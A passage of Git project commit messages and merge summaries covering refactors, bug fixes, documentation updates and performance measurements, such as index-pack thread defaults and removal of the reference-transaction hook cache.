Signed-off-by: Junio C Hamano <gitster@pobox.com>
We allocate a child_env strvec but never free its memory. Instead, let's
just use the strvec that our child_process struct provides, which is
cleaned up automatically when we run the command.
And while we're moving the initialization of the child_process around,
let's switch it to use the official init function (zero-initializing it
works OK, since strvec is happy enough with that, but it sets a bad
example).
Signed-off-by: Jeff King <peff@peff.net>
Reviewed-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The child_process structure has an embedded strvec for formulating
the command line argument list these days, but code that predates
the wide use of it prepared a separate char *argv[] array and
manually set the child_process.argv pointer to point at it.
Teach this old-style code to lose the separate argv[] array.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This ancient script runs "git-foo" all over the place, which is
OK for a scripted Porcelain in the Git suite, but asking "git" to
dispatch to subcommands is the usual way these days.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Running it as "git remote-ext" and letting "git" dispatch to
"remote-ext" would just be fine and is more idiomatic.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 525e18c04b (midx: clear midx on repack, 2018-07-12), 'git repack'
learned to remove a multi-pack-index file if it added or removed a pack
from the object store.
This mechanism is a little over-eager, since it is only necessary to
drop a MIDX if 'git repack' removes a pack that the MIDX references.
Adding a pack outside of the MIDX does not require invalidating the
MIDX, and likewise for removing a pack the MIDX does not know about.
Teach 'git repack' to check for this by loading the MIDX, and checking
whether the to-be-removed pack is known to the MIDX. This requires a
slightly odd alteration to a test in t5319, which is explained with a
comment. A new test is added to show that the MIDX is left alone when
both packs known to it are marked as .keep, but two packs unknown to it
are removed and combined into one new pack.
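The decision rule described above reduces to a membership check, sketched here in Python. The function name and the pack names in the usage note are hypothetical.

```python
def repack_must_drop_midx(midx_packs, removed_packs) -> bool:
    """Drop the MIDX only if a pack it references is being removed."""
    known = set(midx_packs)
    return any(pack in known for pack in removed_packs)
```

Adding a new pack never appears in `removed_packs`, so it cannot invalidate the MIDX in this model; neither does removing packs that the MIDX does not know about.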
Helped-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit 7ba826290a (revision: add rev_input_given flag, 2017-08-02) added
a flag to rev_info to tell whether we got any revision arguments. As
explained there, this is necessary because some revision arguments may
not produce any pending traversal objects, but should still inhibit
default behaviors (e.g., a glob that matches nothing).
However, it only set the flag in the globbing code, but not for
revisions we get on the command-line or via stdin. This leads to two
problems:
- the command-line code keeps its own separate got_rev_arg flag; this
isn't wrong, but it's confusing and an extra maintenance burden
- even specifically-named rev arguments might end up not adding any
pending objects: if --ignore-missing is set, then specifying a
missing object is a noop rather than an error.
And that leads to some user-visible bugs:
- when deciding whether a default rev like "HEAD" should kick in, we
check both got_rev_arg and rev_input_given. That means that
"--ignore-missing $ZERO_OID" works on the command-line (where we set
got_rev_arg) but not on --stdin (where we don't)
- when rev-list decides whether it should complain that it wasn't
given a starting point, it relies on rev_input_given. So it can't
even get the command-line "--ignore-missing $ZERO_OID" right
Let's consistently set the flag if we got any revision argument. That
lets us clean up the redundant got_rev_arg, and fixes both of those bugs
(but note there are three new tests: we'll confirm the already working
git-log command-line case).
A few implementation notes:
- conceptually we want to set the flag whenever handle_revision_arg()
finds an actual revision arg ("handles" it, you might say). But it
covers a ton of cases with early returns. Rather than annotating
each one, we just wrap it and use its success exit-code to set the
flag in one spot.
- the new rev-list test is in t6018, which is titled to cover globs.
This isn't exactly a glob, but it made sense to stick it with the
other tests that handle the "even though we got a rev, we have no
pending objects" case, which are globs.
- the tests check for the oid of a missing object, which it's pretty
clear --ignore-missing should ignore. You can see the same behavior
with "--ignore-missing a-ref-that-does-not-exist", because
--ignore-missing treats them both the same. That's perhaps less
clearly correct, and we may want to change that in the future. But
the way the code and tests here are written, we'd continue to do the
right thing even if it does.
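The wrapping approach from the first implementation note can be sketched roughly as follows. This is a Python illustration, not the C code in revision.c: the RevInfo class, the known_objects set and the helper names are hypothetical, and only the shape (an inner handler with early returns, an outer wrapper that sets the flag on success) is taken from the description above.

```python
from dataclasses import dataclass, field

ZERO_OID = "0" * 40


@dataclass
class RevInfo:
    ignore_missing: bool = False
    rev_input_given: bool = False
    pending: list = field(default_factory=list)


def _handle_revision_arg_1(arg, revs, known_objects):
    """Inner handler with several early returns; 0 means success."""
    if not arg:
        return -1                      # not a revision at all
    if arg not in known_objects:
        # With --ignore-missing, a missing object is a no-op, not an error.
        return 0 if revs.ignore_missing else -1
    revs.pending.append(arg)
    return 0


def handle_revision_arg(arg, revs, known_objects):
    """Wrapper: set the flag in one spot, based on the inner result."""
    ret = _handle_revision_arg_1(arg, revs, known_objects)
    if ret == 0:
        revs.rev_input_given = True
    return ret


def default_rev_applies(revs):
    """A default such as "HEAD" kicks in only if no revision input was given."""
    return not revs.rev_input_given and not revs.pending
```

With ignore_missing set, passing ZERO_OID leaves the pending list empty but still sets rev_input_given, so the default revision does not kick in.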
Reported-by: Bryan Turner <bturner@atlassian.com>
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When adding the reference-transaction hook, there were concerns about
the performance impact it may have on setups which do not make use of
the new hook at all. After all, it gets executed every time a reftx is
prepared, committed or aborted, which linearly scales with the number of
reference-transactions created per session. And as there are code paths
like `git push` which create a new transaction for each reference to be
updated, this may translate to calling `find_hook()` quite a lot.
To address this concern, a cache was added with the intention to not
repeatedly do negative hook lookups. Turns out this cache caused a
regression, which was fixed via e5256c82e5 (refs: fix interleaving hook
calls with reference-transaction hook, 2020-08-07). In the process of
discussing the fix, we realized that the cache doesn't really help even
in the negative-lookup case. While performance tests added to benchmark
this did show a slight improvement in the 1% range, this really doesn't
warrant having a cache. Furthermore, it's quite flaky, too. E.g. running
it twice in succession produces the following results:
Test                         master            pks-reftx-hook-remove-cache
--------------------------------------------------------------------------
1400.2: update-ref           2.79(2.16+0.74)   2.73(2.12+0.71) -2.2%
1400.3: update-ref --stdin   0.22(0.08+0.14)   0.21(0.08+0.12) -4.5%
Test                         master            pks-reftx-hook-remove-cache
--------------------------------------------------------------------------
1400.2: update-ref           2.70(2.09+0.72)   2.74(2.13+0.71) +1.5%
1400.3: update-ref --stdin   0.21(0.10+0.10)   0.21(0.08+0.13) +0.0%
One case notably absent from those benchmarks is a single executable
searching for the hook hundreds of times, which is exactly the case for
which the negative cache was added. p1400.2 will spawn a new update-ref
for each transaction and p1400.3 only has a single reference-transaction
for all reference updates. So this commit adds a third benchmark, which
performs a non-atomic push of a thousand references. This will create a
new reference transaction per reference. But even for this case, the
negative cache doesn't consistently improve performance:
Test                     master            pks-reftx-hook-remove-cache
--------------------------------------------------------------------------
1400.4: nonatomic push   6.63(6.50+0.13)   6.81(6.67+0.14) +2.7%
1400.4: nonatomic push   6.35(6.21+0.14)   6.39(6.23+0.16) +0.6%
1400.4: nonatomic push   6.43(6.31+0.13)   6.42(6.28+0.15) -0.2%
So let's just remove the cache altogether to simplify the code.
Signed-off-by: Patrick Steinhardt <ps@pks.im>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The definitions of 'verify_submodule_committish()' and
'print_submodule_summary()' had wrong styling in terms of the asterisk
placement. Amend them.
Also, the warning printed in case of an unexpected file mode printed the
mode in decimal. Print it in octal for enhanced readability.
Reported-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When fetching with packfile URIs and transfer.fsckobjects=1, use the
--fsck-objects instead of the --strict flag when invoking index-pack so
that links are not checked, only objects. This is because incomplete
links are expected. (A subsequent connectivity check will be done when
all the packs have been downloaded regardless of whether
transfer.fsckobjects is set.)
This is similar to 98a2ea46c2 ("fetch-pack: do not check links for
partial fetch", 2018-03-15), but for packfile URIs instead of partial
clones.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
dd4b732df7 ("upload-pack: send part of packfile response as uri",
2020-06-10) added the "only_packfile" parameter to get_pack() but did
not document it. Add documentation.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The patch-id computation did not ignore the "incomplete last line"
marker like whitespaces.
* rs/patch-id-with-incomplete-line:
patch-id: ignore newline at end of file in diff_flush_patch_id()
Doc updates for subtree (in contrib/)
* dl/subtree-docs:
contrib/subtree: document 'push' does not take '--squash'
contrib/subtree: fix "unsure" for --message in the document
The recent addition of SHA-256 support is marked as experimental in
the documentation.
* ma/doc-sha-256-is-experimental:
Documentation: mark `--object-format=sha256` as experimental
Use more buffered I/O where we used to call many small write(2)s.
* rs/more-buffered-io:
upload-pack: use buffered I/O to talk to rev-list
midx: use buffered I/O to talk to pack-objects
connected: use buffered I/O to talk to rev-list
"ls-files -o" mishandled the top-level directory of another git
working tree that hangs in the current git working tree.
* en/dir-nonbare-embedded:
dir: avoid prematurely marking nonbare repositories as matches
t3000: fix some test description typos
The "--batch-size" option of "git multi-pack-index repack" command
is now used to specify that very small packfiles are collected into
one until the total size roughly exceeds it.
* ds/midx-repack-to-batch-size:
multi-pack-index: repack batches below --batch-size
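A rough sketch of the selection rule described above, in Python. The order in which packs are considered, the skipping of packs at or above the batch size, the "at least two packs" rule and the function name are all assumptions made for illustration; the real logic lives in Git's C code and may differ in detail.

```python
def select_packs_for_repack(pack_sizes, batch_size):
    """Return indexes of small packs to combine into one new pack.

    pack_sizes: sizes in bytes, in the order the packs are considered
    (the order itself is an assumption of this sketch).
    """
    selected = []
    total = 0
    for index, size in enumerate(pack_sizes):
        if size >= batch_size:
            continue            # already large enough; leave it alone
        selected.append(index)
        total += size
        if total >= batch_size:
            break               # the batch has roughly reached the target
    # Assumption: combining fewer than two packs would accomplish nothing.
    return selected if len(selected) >= 2 else []
```

For example, with sizes [10, 500, 20, 30, 40] and a batch size of 50, the sketch picks the packs at indexes 0, 2 and 3 and stops once their total reaches 60.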
The purpose of "git init --separate-git-dir" is to initialize a
new project with the repository separate from the working tree,
or, in the case of an existing project, to move the repository
(the .git/ directory) out of the working tree. It does not make
sense to use --separate-git-dir with a bare repository for which
there is no working tree, so disallow its use with bare
repositories.
* es/init-no-separate-git-dir-in-bare:
init: disallow --separate-git-dir with bare repository
A subsequent commit will make the quantum of work smaller, necessitating
more locking. This commit allows resolve_delta() to be called outside
the lock.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is refactoring 2 of 2 to simplify struct base_data.
Whenever we make a struct base_data, immediately calculate its delta
children. This eliminates confusion as to when the
{ref,ofs}_{first,last} fields are initialized.
Before this patch, the delta children were calculated at the last
possible moment. This allowed the members of struct base_data to be
populated in any order, superficially useful when we have the object
contents before the struct object_entry. But this makes reasoning about
the state of struct base_data more complicated, hence this patch.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is refactoring 1 of 2 to simplify struct base_data.
In index-pack, each thread maintains a doubly-linked list of the delta
chain that it is currently processing (the "base" and "child" pointers
in struct base_data). When a thread exceeds the delta base cache limit
and needs to reclaim memory, it uses the "child" pointers to traverse
the lineage, reclaiming the memory of the eldest delta bases first.
A subsequent patch will perform memory reclaiming in a different way and
will thus no longer need the "child" pointer. Because the "child"
pointer is redundant even now, remove it so that the aforementioned
subsequent patch will be clearer. In the meantime, reclaim memory in the
reverse order of the "base" pointers.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
find_{ref,ofs}_delta_{,children} take an enum object_type parameter, but
the object type is already present in the name of the function. Remove
that parameter from these functions.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Clarify that core.deltaBaseCacheLimit is per-thread, as can be seen from
the fact that cache usage (base_cache_used in struct thread_local in
builtin/index-pack.c) is tracked individually for each thread and
compared against delta_base_cache_limit.
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Ensure that the [--first-parent] option is listed in the output of
"git bisect -h".
Signed-off-by: Aaron Lipman <alipman88@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The pathspec given to git checkout and git restore is used with both
tree_entry_interesting (via read_tree_recursive) and match_pathspec
(via ce_path_match). The latter effectively only supports recursive
matching regardless of the value of the pathspec flag "recursive",
which is unset here.
That causes different match results for pathspecs with wildcards, and
can lead checkout and restore in no-overlay mode to remove entries
instead of modifying them. Enable recursive matching for both checkout
and restore to make matching consistent.
Setting the flag in checkout_main() technically also affects git switch,
but since that command doesn't accept pathspecs at all this has no
actual consequence.
Reported-by: Sergii Shkarnikov <sergii.shkarnikov@globallogic.com>
Initial-test-by: Sergii Shkarnikov <sergii.shkarnikov@globallogic.com>
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If `user.name` and `user.email` have not been configured and the
user invokes:
git commit --author=...
without specifying the committer identity, then Git errors out with
a message asking the user to configure `user.name` and `user.email`
but doesn't tell the user which attribution was missing. This can be
confusing for a user new to Git who isn't aware of the distinction
between user, author, and committer.
Give such users a bit more help by extending the error message to
also say which attribution is expected.
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'contents' atom does not show any error if used with 'trailers'
atom and colon is missing before trailers arguments.
e.g. %(contents:trailersonly) works, while it shouldn't.
It is definitely not an expected behavior.
Let's fix this bug.
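To illustrate the intended behavior, here is a minimal Python sketch of a strict parser for the part after "contents:". It is not the ref-filter C code; the function name and the short list of other accepted arguments are assumptions. The point is only that "trailers" must be followed either by nothing or by a colon.

```python
def parse_contents_atom(arg):
    """Parse the part after "contents:" and return (kind, options).

    Raises ValueError for malformed input such as "trailersonly".
    """
    if arg == "trailers":
        return ("trailers", [])
    if arg.startswith("trailers:"):
        # Everything after the colon is a comma-separated option list.
        options = arg[len("trailers:"):].split(",")
        return ("trailers", options)
    # Assumption: a small subset of the other arguments, for illustration.
    if arg in ("body", "subject", "signature"):
        return (arg, [])
    raise ValueError(f"unrecognized %(contents) argument: {arg}")
```

A lenient parser that only checks for the "trailers" prefix would accept "trailersonly"; requiring an exact match or the "trailers:" prefix rejects it.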
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A handful of Git's commands respect `--abbrev' for customizing length
of abbreviation of object names.
For diff-family, Git supports 2 different options for 2 different
purposes, `--full-index' for showing diff-patch object's name in full,
and `--abbrev' to customize the length of object names in diff-raw and
diff-tree header lines, without any options to customise the length of
object names in diff-patch format. When working with diff-patch format,
we only have two options, either full index, or default abbrev length.
Although that behaviour is documented, it doesn't stop users from
trying to use `--abbrev' with the hope of customising diff-patch's
objects' name's abbreviation.
Let's allow the blob object names shown on the "index" line to be
abbreviated to arbitrary length given via the "--abbrev" option.
To preserve backward compatibility with old scripts that specify both
`--full-index' and `--abbrev', always show full object id
if `--full-index' is specified.
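The precedence between the two options can be sketched as below. This is a simplified Python illustration with a hypothetical function name; it ignores the uniqueness check that real abbreviation performs, and the default length of 7 is an assumption of the sketch.

```python
def index_line_name(oid, full_index=False, abbrev=None, default_abbrev=7):
    """Return the object name as it would appear on the "index" line."""
    if full_index:
        return oid                  # --full-index always wins
    length = abbrev if abbrev is not None else default_abbrev
    return oid[:length]
```

So a script that passes both options keeps getting full object names, while "--abbrev" alone now controls the length.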
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Since 72f936b1 (t4013: make test hash independent, 2020-02-07),
we have adjusted the metadata in git-diff's output in order to
ignore uninteresting metadata that depends on the underlying hash
algorithm.
However, we forgot to special-case all-zero object names, which
denote missing objects. As a consequence, we couldn't catch
possible future bugs where object names are all zeros, including but
not limited to:
* show intend-to-add entry
* deleted entry
* diff between index and working tree with new file
We also mistakenly munged file-modes as if they were object names
abbreviated to 6 hexadecimal digits.
In addition, in the upcoming change, we would like to test for
customizing the length of abbreviated blob objects on the index line,
which is not supported by current diff-processor logic.
Let's fix the bug for all-zero object names, and file modes.
While we're at it, support abbreviation of object names up to 16 bytes.
Based-on-patch-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: brian m. carlson <sandals@crustytoothpaste.net>
Signed-off-by: Đoàn Trần Công Danh <congdanhqx@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Currently, there are different tests for testing %(trailers) and
%(contents:trailers) causing redundant copy.
It's time to get rid of duplicate code.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Heba Waly <heba.waly@gmail.com>
Signed-off-by: Hariom Verma <hariom18599@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While YAML allows different indentation styles as long as each block
is consistent, it is rather unusual to mix different indentations in
a single file. Adjust to use two-space indentation everywhere.
Signed-off-by: Adrian Moennich <adrian@planetcoding.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Commit b8a2486f15 (index-pack: support multithreaded delta resolving,
2012-05-06) describes an experiment that shows that setting the number
of threads for index-pack higher than 3 does not help.
I repeated that experiment using a more modern version of Git and a more
modern CPU and got different results.
Here are timings for p5302 against linux.git run on my laptop, a Core
i9-9880H with 8 cores plus hyperthreading (so online-cpus returns 16):
5302.3: index-pack 0 threads 256.28(253.41+2.79)
5302.4: index-pack 1 threads 257.03(254.03+2.91)
5302.5: index-pack 2 threads 149.39(268.34+3.06)
5302.6: index-pack 4 threads 94.96(294.10+3.23)
5302.7: index-pack 8 threads 68.12(339.26+3.89)
5302.8: index-pack 16 threads 70.90(655.03+7.21)
5302.9: index-pack default number of threads 116.91(290.05+3.21)
You can see that wall-clock times continue to improve dramatically up to
the number of cores, but bumping beyond that (into hyperthreading
territory) does not help (and in fact hurts a little).
Here's the same experiment on a machine with dual Xeon 6230's, totaling
40 cores (80 with hyperthreading):
5302.3: index-pack 0 threads 310.04(302.73+6.90)
5302.4: index-pack 1 threads 310.55(302.68+7.40)
5302.5: index-pack 2 threads 178.17(304.89+8.20)
5302.6: index-pack 5 threads 99.53(315.54+9.56)
5302.7: index-pack 10 threads 72.80(327.37+12.79)
5302.8: index-pack 20 threads 60.68(357.74+21.66)
5302.9: index-pack 40 threads 58.07(454.44+67.96)
5302.10: index-pack 80 threads 59.81(720.45+334.52)
5302.11: index-pack default number of threads 134.18(309.32+7.98)
The results are similar; things stop improving at 40 threads. Curiously,
going from 20 to 40 really doesn't help much, either (and increases CPU
time considerably). So that may represent an actual barrier to
parallelism, where we lose out due to context-switching and loss of
cache locality, but don't reap the wall-clock benefits due to contention
of our coarse-grained locks.
So what's a good default value? It's clear that the current cap of 3 is
too low; the best times on each machine take 42% and 57% less wall-clock
time than our defaults. The results on the 40-core machine imply that 20
threads is an actual barrier regardless of the number of cores, so we'll
take that as a maximum. We get the best results on these machines at
half of the online-cpus value. That's presumably a result of the
hyperthreading. That's common on multi-core Intel processors, but not
necessarily elsewhere. But if we take it as an assumption, we can
perform optimally on hyperthreaded machines and still do much better
than the status quo on other machines, as long as we never halve below
the current value of 3.
So that's what this patch does.
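The heuristic argued for above can be sketched like this. It is a Python illustration derived from the prose, not the patch itself: the function name is hypothetical, and using every CPU on machines with fewer than four is an assumption of the sketch.

```python
def default_index_pack_threads(online_cpus):
    """Pick a default thread count from the number of online CPUs."""
    if online_cpus < 4:
        return online_cpus          # too few CPUs for halving to matter (assumption)
    if online_cpus < 6:
        return 3                    # never halve below the historical value of 3
    if online_cpus < 40:
        return online_cpus // 2     # roughly one thread per physical core
    return 20                       # hard cap; more did not help in the experiments
```

On the two machines measured above this gives 8 threads for 16 online CPUs and 20 threads for 80.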
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When PERF_EXTRA is enabled, p5302 checks the performance of index-pack
with various numbers of threads. This can be useful for deciding what
the default should be (which is currently capped at 3 threads based on
the results of this script).
However, we only go up to 8 threads, and modern machines may have more.
Let's get the number of CPUs from test-tool, and test various numbers of
threads between one and that maximum.
Note that the current tests aren't all identical, as we have to set
GIT_FORCE_THREADS for the --threads=1 test (which measures the overhead
of starting a single worker thread versus the "0" case of using the main
thread). To keep the loop simple, we'll keep the "0" case out of it, and
set GIT_FORCE_THREADS=1 for all of the other cases (it's a noop for all
but the "1" case, since numbers higher than 1 would always need
threads).
Note also that we could skip running "test-tool" if PERF_EXTRA isn't
set. However, there's some small value in knowing the number of threads,
so that we can mark each test as skipped in the output.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The primary function of the perf suite is to detect regressions (or
improvements) between versions of Git. The only numbers we show a direct
comparison for are timings between the same test run on two different
versions.
However, it can sometimes be used to collect other information. For
instance, p5302 runs the same index-pack operation with different thread
counts. The output doesn't directly compare these, but anybody
interested in working on index-pack can manually compare the results.
For a normal regression run of the full perf-suite, though, this incurs
a significant cost to generate numbers nobody will actually look at;
about 25% of the total time of the test suite is spent in p5302. And the
low-thread-count runs are the most expensive part of it, since they're
(unsurprisingly) not using as many threads.
Let's skip these tests by default, but make it possible for people
working on index-pack to still run them by setting an environment
variable. Rather than make this specific to p5302, let's introduce a
generic mechanism. This makes it possible to run the full suite with
every possible test if somebody really wants to burn some CPU.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Add a NEEDSWORK regarding the outdated syntax and working of the test,
which may need to be improved to obtain better and desired results.
While at it, change the word 'test' to 'test script' in the test
description to avoid ambiguity.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Helped-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the test_i18ncmp syntax from 'test_i18ncmp actual expected' to
'test_i18ncmp expected actual' to align it with the convention followed
by other tests in the test script.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git rev-parse' can limit the number of characters in the hash it
outputs using the '--short' option, thereby, making the 'cut' invocation
redundant. Since using '--short' implies '--verify' as well, we can
safely replace the latter with the former. This change results in the
helper functions getting the hash in the same way 'summary' gets the
hash internally.
So, avoid the unnecessary invocation to 'cut' in the helper
functions.
Mentored-by: Christian Couder <chriscool@tuxfamily.org>
Mentored-by: Kaartic Sivaraam <kaartic.sivaraam@gmail.com>
Signed-off-by: Shourya Shukla <shouryashukla.oo@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When pseudorefs move to a different ref storage mechanism, pseudorefs can no
longer be removed with 'rm'. Instead, suggest an "update-ref -d" command, which will
work regardless of ref storage backend.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Check for existence and delete CHERRY_PICK_HEAD through ref functions.
This will help cherry-pick work with alternate ref storage backends.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This will be necessary to replace file existence checks for pseudorefs.
Signed-off-by: Han-Wen Nienhuys <hanwen@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The blurb for "--cached" says it implies "--index", but in reality
"--cached" and "--index" are distinct modes with different behavior.
Additionally, the descriptions of "--index" and "--cached" are somewhat
unclear about what might be modified, and what "--index" looks for to
determine that the index and working copy "match".
Rewrite the blurbs for both options for clarity and accuracy.
Signed-off-by: Raymond E. Pasco <ray@ameretat.dev>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When fetching a pack from a promisor remote, the corresponding .promisor
file needs to be created. "fetch-pack" originally did this by passing
"--promisor" to "index-pack", but in 5374a290aa ("fetch-pack: write
fetched refs to .promisor", 2019-10-16), "fetch-pack" was taught to do
this itself instead, because it needed to store ref information in the
.promisor file.
This causes a problem with superprojects when transfer.fsckobjects is
set, because in the current implementation, it is "index-pack" that
calls fsck_finish() to check the objects; before 5374a290aa,
fsck_finish() would see that .gitmodules is a promisor object and
tolerate it being missing, but after, there is no .promisor file (at the
time of the invocation of fsck_finish() by "index-pack") to tell it that
.gitmodules is a promisor object, so it returns an error.
Therefore, teach "fetch-pack" to pass "--promisor" to "index-pack" once
again. "fetch-pack" will subsequently overwrite this file with the ref
information.
An alternative is to instead move object checking to "fetch-pack", and
let "index-pack" only index the files. However, since "index-pack" has
to inflate objects in order to index them, it seems reasonable to also
let it check the objects (which also require inflated files).
Signed-off-by: Jonathan Tan <jonathantanmy@google.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When options such as --ignore-space-change are in use, files with
modifications can have no interesting textual changes worth showing. In
such cases, "git diff --stat" shows 0 lines of additions and deletions.
Teach "git diff --stat" not to show such a path in its output, which
would be more natural.
However, we don't want to hide every file that has 0 effective changes,
since such an entry could be the result of a rename, permission change,
or other similar operation that may still be of interest. Additions and
deletions are likewise special-cased, as they are always interesting.
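The rule can be sketched as a small predicate. This is a Python illustration with hypothetical names (StatEntry and its fields are not Git's data structures); it only encodes the cases listed above.

```python
from dataclasses import dataclass


@dataclass
class StatEntry:
    status: str        # "M" modified, "A" added, "D" deleted, "R" renamed
    added: int         # lines added after whitespace options are applied
    deleted: int       # lines deleted after whitespace options are applied
    old_mode: int
    new_mode: int


def shown_in_stat(entry):
    """Decide whether a path appears in the --stat output."""
    uninteresting = (
        entry.status == "M"
        and entry.added == 0
        and entry.deleted == 0
        and entry.old_mode == entry.new_mode
    )
    return not uninteresting
```

Only a plain modification with no effective line changes and no mode change is dropped; everything else stays in the output.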
Signed-off-by: Matthew Rogers <mattr94@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When set to 1, GIT_COMPLETION_SHOW_ALL causes --git-completion-helper-all
to be passed instead of --git-completion-helper.
Signed-off-by: Ryan Zoeller <rtzoeller@rtzoeller.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
--git-completion-helper excludes hidden options, such as --allow-empty
for git commit. This is typically helpful, but occasionally we want
auto-completion for obscure flags. --git-completion-helper-all returns
all options, even if they are marked as hidden or nocomplete.
Signed-off-by: Ryan Zoeller <rtzoeller@rtzoeller.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
midx and commit-graph files now use the byte defined in their file
format specification for identifying the hash function used for
object names.
* ds/sha256-leftover-bits:
multi-pack-index: use hash version byte
commit-graph: use the "hash version" byte
t/README: document GIT_TEST_DEFAULT_HASH
Further update of docs to adjust to the recent SHA-256 work.
* ma/sha-256-docs:
shallow.txt: document SHA-256 shallow format
protocol-capabilities.txt: clarify "allow-x-sha1-in-want" re SHA-256
index-format.txt: document SHA-256 index format
http-protocol.txt: document SHA-256 "want"/"have" format
A few end-user facing messages have been updated to be
hash-algorithm agnostic.
* jc/object-names-are-not-sha-1:
messages: avoid SHA-1 in end-user facing messages
Further update of docs to adjust to the recent SHA-256 work.
* bc/sha-256-doc-updates:
docs: fix step in transition plan
docs: document SHA-256 pack and indices
The regexp to identify the function boundary for FORTRAN programs
has been updated.
* pb/userdiff-fortran-update:
userdiff: improve Fortran xfuncname regex
userdiff: add tests for Fortran xfuncname regex
When given more than one target line ranges, "git blame -La,b
-Lc,d" was over-eager to coalesce groups of original lines and
showed incorrect results, which has been corrected.
* jk/blame-coalesce-fix:
blame: only coalesce lines that are adjacent in result
t8003: factor setup out of coalesce test
t8003: check output of coalesced blame
Ring buffer with size 4 used for bin-hex translation resulted in a
wrong object name in the sequencer's todo output, which has been
corrected.
* ak/sequencer-fix-find-uniq-abbrev:
rebase -i: fix possibly wrong onto hash in todo
The commit labels used to explain each side of conflicted hunks
placed by the sequencer machinery have been made more readable by
humans.
* en/sequencer-merge-labels:
sequencer: avoid garbled merge machinery messages due to commit labels
"git diff [<tree-ish>] $path" for a $path that is marked with i-t-a
bit was not showing the mode bits from the working tree.
* rp/ita-diff-modefix:
diff-lib: use worktree mode in diffs from i-t-a entries
Updates to "git merge" tests, in preparation for a new merge
strategy backend.
* en/merge-tests:
t6425: be more flexible with rename/delete conflict messages
t642[23]: be more flexible for add/add conflicts involving pair renames
t6422, t6426: be more flexible for add/add conflicts involving renames
t6423: add an explanation about why one of the tests does not pass
t6416, t6423: clarify some comments and fix some typos
t6422: fix multiple errors with the mod6 test expectations
t6423: fix test setup for a couple tests
t6416, t6422: fix incorrect untracked file count
t6422: fix bad check against missing file
t6418: tighten delete/normalize conflict testcase
Collect merge-related tests to t64xx
The previous commit introduced --ignore-date flag to rebase -i, but the
name is rather vague as it does not say whether the author date or the
committer date is ignored. Add an alias to convey the precise purpose.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Rohit Ashiwal <rohit.ashiwal265@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Rebase is implemented with two different backends - 'apply' and
'merge' - each of which supports a different set of options. In
particular, the apply backend supports a number of options implemented
